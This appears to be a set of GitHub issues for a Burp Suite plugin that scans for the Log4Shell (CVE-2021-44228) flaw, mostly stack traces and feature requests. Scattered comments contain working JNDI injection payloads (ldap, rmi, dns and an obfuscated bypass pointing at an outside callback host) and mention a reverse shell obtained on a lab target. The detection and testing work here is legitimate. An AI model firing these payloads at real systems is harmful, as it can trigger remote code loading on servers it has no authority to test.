f0ng / log4j2burpscanner
CVE-2021-44228 Log4j2 BurpSuite Scanner, customize ceye.io api or other apis, including internal networks
Home Page: https://f0ng.github.io/2021/12/22/log4j2burpscanner/
Request headers such as Content-Type, Referer, Accept-Language, Accept and Accept-Encoding can all be trigger points. Please add them to the detection scope. Thanks.
java.lang.NullPointerException: Cannot invoke "okhttp3.Response.body()" because "response2" is null
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1799)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:831)
log4j2burpscanner v0.18.6
win10x64 java version 11
burpsuite v2021.8
After the plugin has been enabled for a long time, Burp Suite's memory usage keeps increasing.
Detection for XML data
Hi, any idea why I'm getting these errors? I use the latest version of your extension.
Macbook
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
JDK (build 1.8.0_321-b07)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.ei4 @7034e82d)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1467)
at burp.dbq.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:831)
Thanks
java.lang.ClassNotFoundException: burp.BurpExtender
at java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:476)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:589)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
at java.base/java.lang.Class.forName0(Native Method)
at java.base/java.lang.Class.forName(Class.java:398)
at burp.b0r.a(Unknown Source)
at burp.b0r.(Unknown Source)
at burp.c73.a(Unknown Source)
at burp.igl.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:829)
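For example:
{
user:"sjjsjssjjs${jndi:ldap://1111111}" # this one can be resolved
user:"sjjsjssjjs%24{jndi:ldap://1111111}" # this one cannot be resolved
}
In the current version, although $ is encoded and Burp shows a vulnerability, there is no record on dnslog. I don't know why. (The site itself is vulnerable.)
The current version no longer has the step of replaying the unencoded PoC once more. I don't know whether it was removed.
Earlier versions replayed the request once more without encoding. An option could be added for whether to encode $.
I have also changed the JDK version. Is it a compilation problem?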
java.lang.NullPointerException
at burp.dcb.O(Unknown Source)
at burp.cz8.getHttpService(Unknown Source)
at burp.hy.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:149)
at burp.hmr.a(Unknown Source)
at burp.bp4.b(Unknown Source)
at burp.gj_.a(Unknown Source)
at burp.gj_.a(Unknown Source)
at burp.dmr.a(Unknown Source)
at burp.cup.a(Unknown Source)
at burp.ifl.a(Unknown Source)
at burp.dmr.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754)
at burp.gm0.a(Unknown Source)
at burp.gm0.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828)
at burp.d0z.a(Unknown Source)
at burp.cup.a(Unknown Source)
at burp.cup.b(Unknown Source)
at burp.d0w.a(Unknown Source)
at burp.iew.addSuiteTab(Unknown Source)
at burp.fvi.addSuiteTab(Unknown Source)
at burp.exn.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:292)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:247)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:535)
at burp.hs6.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:830)
com.alibaba.fastjson.JSONException: not close json text, token : int
at com.alibaba.fastjson.parser.DefaultJSONParser.close(DefaultJSONParser.java:1527)
at com.alibaba.fastjson.JSON.parse(JSON.java:174)
at com.alibaba.fastjson.JSON.parse(JSON.java:180)
at com.alibaba.fastjson.JSON.parse(JSON.java:149)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:241)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:475)
at burp.hs6.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:830)
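Why is the plugin interface empty after right-clicking "Send to log4j2 Scanner"? The scan seems to have no effect. I tried many times with the same result. Please help~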
`java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.aii.T(Unknown Source)
at burp.cnn.getHttpService(Unknown Source)
at burp.gvg.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.bpc.a(Unknown Source)
at burp.fno.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.jf.a(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.dc4.b(Unknown Source)
at burp.jf.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addImpl(Container.java:1147)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:760)
at burp.cd6.a(Unknown Source)
at burp.cd6.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:834)
at burp.bxg.a(Unknown Source)
at burp.guy.c(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.ftr.a(Unknown Source)
at burp.d0t.addSuiteTab(Unknown Source)
at burp.i78.addSuiteTab(Unknown Source)
at burp.c04.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:863)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
`
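0.15 update
1. Added the option to choose between dns and ldap. rmi is missing; I replied to you in an earlier thread asking for it to be added, but you probably didn't see it.
The payload formats the plugin currently supports are ${jndi:ldap://xxx.ceye.io/test} and ${jndi:dns://xxx.ceye.io/test}. Because of JDK and component issues on the vulnerable server, ${jndi:rmi://xxx.ceye.io/test} is missing. On the vulfocus target, this was the payload that successfully got a reverse shell.
This means Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
The tool used was JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar.
For example, adding scanning with custom bypass payloads, such as: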
%24%7Bjndi:ldap://%24%7BhostName%7DXXXX%24%7B::-.%http://upnnhdrm4xboo3bhucusb6x64xanyc.burpcollaborator.net%7Dzzzz
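It seems that neither traffic proxied in from AWVS nor Burp's built-in crawler gets the payload added. Manually testing through Repeater works.
Even with the custom header lists left empty, the jndi payload still appears in the request, causing request errors.
I am currently receiving a lot of pointless passive scans from your plugin. Please globally whitelist 咕.com (xn--9tr.com). Thanks.
I set up two targets locally (POST requests), plus one real site (GET request). Manual testing in turn showed that all of them are vulnerable, but the plugin only detected the first one. The other two sites were not detected.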
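When testing in a lab, version 0.16.7 URL-encodes "$" when sending the payload, which prevents the payload from being loaded.
1. For payload requests, I suggest adding a sequence number to each payload. That is, if a request has 5 places where the plugin can automatically insert a payload, the payloads for the 5 parameters could run from test1.XXX.ceye.io to test5.XXX.ceye.io. Then, when viewing the ceye.io log, you know which payload triggered the vulnerability, which makes it easy to locate the vulnerable point in the request.
2. Could you add an intranet detection option that switches to custom rmi and ldap request addresses, for quickly verifying the vulnerability on intranet assets that have no outbound access? Having the plugin automatically insert the payload into parameters for testing saves a lot of time.
With the vulnerability breaking out over the past few days, many client organizations are demanding checks, so this requirement is quite important.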
First of all thanks for this tool. Everything works perfectly. Except one very important thing. It doesn't report the vulnerable parameters. Do you think you can implement this?
Cheers
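I've been studying this for ages and can't figure out how to use it. Could someone walk me through it?
Does this plugin run automatically, so that I only need to capture traffic?
The lab is the one I just emailed you. I configured a ceye.io domain and the DNS received the request, but the plugin did not report a vulnerability. I've sent you the screenshot by email. Also, with the default dnslog it detected only once, and after that nothing was detected. I don't know the exact cause; you may need to test it yourself. I've sent the images to your mailbox, please take a look.
You should be careful on your side. I don't know whether it will affect you. I suggest setting up a private group or something similar and distributing it internally! Last time I asked to add you on WeChat you didn't reply. Please check your email.
I found that for some sites the request address is too long, so they all look the same and I can't pinpoint a specific parameter. Could a random string marker be added to help locate it?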
java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1474)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
But there is a response to jndi:ldap://
Can't seem to find the passive option displayed on the git
https://user-images.githubusercontent.com/48286013/146666473-83b53bfe-7a41-4379-b22c-a1085125e2e7.png
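Environment: jdk11 + Burp (version 2021.5.1)
Problem 1: After enabling passive scanning, I don't see any detection payloads being sent.
Problem 2: When using active detection with ceye, the ceye backend already shows the request data, which proves the vulnerability exists, but the plugin does not show it.
After loading the plugin and configuring it, no log4j passive scanning took place while intercepting packets.
This is the generated payload: %24{jndi:rmi:://ip:port/%20test}
1. On internal networks, people often don't set up a dnslog specifically for testing. More commonly they start a JNDI service directly and the vulnerable asset connects back to the ldap/rmi://ip:port/xxx you configured. The plugin's settings only support the intranet dnslog format, and without domain name resolution the generated parameter cannot be reached at all. The target machine has no DNS record for your domain, so it can only be the full IP format.
Wrong: ${jndi:dns://0.POST.192.168.80.10.hello.192.168.80.6:8001/%20test}
Correct: ${jndi:dns://192.168.80.6:8001/%20test}
In this case the position of the vulnerable parameter cannot be located, although the vulnerability itself can be found. Further manual testing, parameter by parameter, is needed. You can no longer rely on the numeric index carried in the DNS lookup for quick location. For this optimization, the intranet dnslog configuration could be replaced directly with ip:port, since with or without outbound access nothing can resolve to your privately deployed dnslog.
2. Also, after changing dns to rmi, the payload sent is still dns. After changing to ldap, nothing is sent at all. It would be better to simply cycle through all 3, which saves a lot of time. Especially with many assets, changing the 3 parameters in turn and re-running every request is very inefficient. You could add a switch: either specify one, or by default test all 3.
3. In {jndi:dns://0.POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce.xxx.ceye.io/%20test, the POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce. part is somewhat redundant. Could it be simplified? If the domain carries odd content, the callback might trigger security device rules. Keeping just the numeric part, 0.xxx.ceye.io/%20test, is enough.
4. Add the several jndi: bypass formats to the default sending state, to ensure accurate vulnerability location.
The cause is the JDK version. The author's JDK versions are 1.8_231 and 1.8_151, and testing is normal on both. Please do not submit similar issues again. There are too many JDK versions to be compatible with all of them. Thank you for your understanding.
The plugin currently replaces all parameters in a request at once, right? That does reduce the number of requests sent.
But I ran into a problem: the vulnerable point is on the WAF, and when all parameters in a request are replaced at the same time it does not trigger. It only triggers when a single parameter alone carries the payload.
Also, when the option to test other header parameters is checked, parameters that did not exist in the original request are added, causing request errors and so on.
Hi, right-clicking "Send to log4j2" does nothing. I saw your replies to other people and tested the JDK versions you use, and the same problem occurs. Looking forward to your reply.
First, I suggest adding a feature that tests all request header parameters, because in use I found that some request headers are not among the options but are vulnerable. For example, the vulfocus lab added a new x-api-version request header that is vulnerable, but the plugin does not scan it.
Second, there is a problem with the judgment criterion. When testing this parameter on the lab, I found that another parameter was vulnerable and produced a dnslog callback, but the response was 406, so that vulnerable point was not reported.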
Hi again
What is the difference between log4j2burpscanner-0.18.3-jdk11.jar and log4j2burpscanner-0.18.3-jdk8.jar
What version is better for Mac if my java version in use is "15.0.1" ?
Is it possible to make it work with Burp Collaborator instead of ceyedns?
Thanks
For example, if I have xray's reverse-connection platform running locally, how should I configure the response URL field?
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.gpz.P(Unknown Source)
at burp.dzg.getHttpService(Unknown Source)
at burp.gn0.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151)
at burp.cio.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.a_p.a(Unknown Source)
at burp.g8.b(Unknown Source)
at burp.fjz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JSplitPane.addImpl(JSplitPane.java:1009)
at java.desktop/java.awt.Container.add(Container.java:997)
at java.desktop/javax.swing.JSplitPane.setLeftComponent(JSplitPane.java:453)
at burp.fjo.d(Unknown Source)
at burp.fjo.b(Unknown Source)
at burp.fjo.a(Unknown Source)
at burp.fjo.lambda$layoutInitialised$2(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
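The plugin's current X-Forwarded-For payload is:
X-Forwarded-For: 127.0.0.1,${jndi:dns://14.xxxxxxxxxxx
The situation I've encountered is that X-Forwarded-For is vulnerable, but after "127.0.0.1," is added the vulnerability test does not succeed.
I suggest changing it to X-Forwarded-For:payload
Either remove "127.0.0.1," directly or add this as an additional case.
In 0.15, after Burp loads the plugin for the first time, dnsldaprmi=dns appears twice in the dnslog section. It was probably written twice. A minor issue; deleting one and saving fixes it, though I don't know which one has the highest priority if both coexist, haha.
Through Logger++ I observed that the payload has the form %24{jndi:dns://xxxxxx.ceye.io/%20test}. Testing the vulnerability on the site, if I remove %20 there is a callback; with %20 there is none.
Is %20 by design?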